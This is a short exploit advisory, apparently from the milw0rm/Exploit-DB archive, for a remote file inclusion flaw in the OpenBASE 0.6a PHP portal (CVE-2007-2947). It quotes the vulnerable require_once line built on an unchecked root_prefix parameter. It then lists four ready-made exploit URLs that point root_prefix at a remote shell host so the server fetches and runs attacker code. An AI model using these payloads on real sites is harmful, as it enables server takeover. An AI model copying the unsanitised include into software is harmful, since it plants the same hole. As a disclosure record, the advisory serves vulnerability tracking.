OpenBASE 0.6a - 'root_prefix' Remote File Inclusion
Author: DeltahackingTEAM
type: webapps
platform: php
port:
date_added: 2007-05-24
date_updated: 2016-10-05
verified: 1
codes: OSVDB-38048;CVE-2007-2947;OSVDB-38047;OSVDB-38046;OSVDB-38045
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comopenbase_alpha_0_6.zip
**********************************************************************************************************
DeltaSecurityTEAM
WwW.DeltaSecurity.iR
**********************************************************************************************************
* Portal Name = OpenBASE Alpha 0.6
* Class = Remote File Inclusion
* Risk = High (Remote File Execution)
* Download = Http://openbase.sourceforge.net
* Discoverd By = DeltahackingTEAM
* User In Delta Team = Dav00d_Cracker
* Conatact = Davood_cracker@Yahoo.com
--------------------------------------------------------------------------------------------
Vulnerability C0de :
Require_once($root_prefix . "nav.php");
--------------------------------------------------------------------------------------------
- Expl0it:
Http://localhost/[PATH]/index.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/email_subscribe.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/download.php?root_prefix=http://Shellz?
Http://localhost/[PATH]/development.php?root_prefix=http://Shellz?
--------------------------------------------------------------------------------------------
Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , all IRANIAN Hackers , and all Enemy
**********************************************************************************************************
# milw0rm.com [2007-05-25]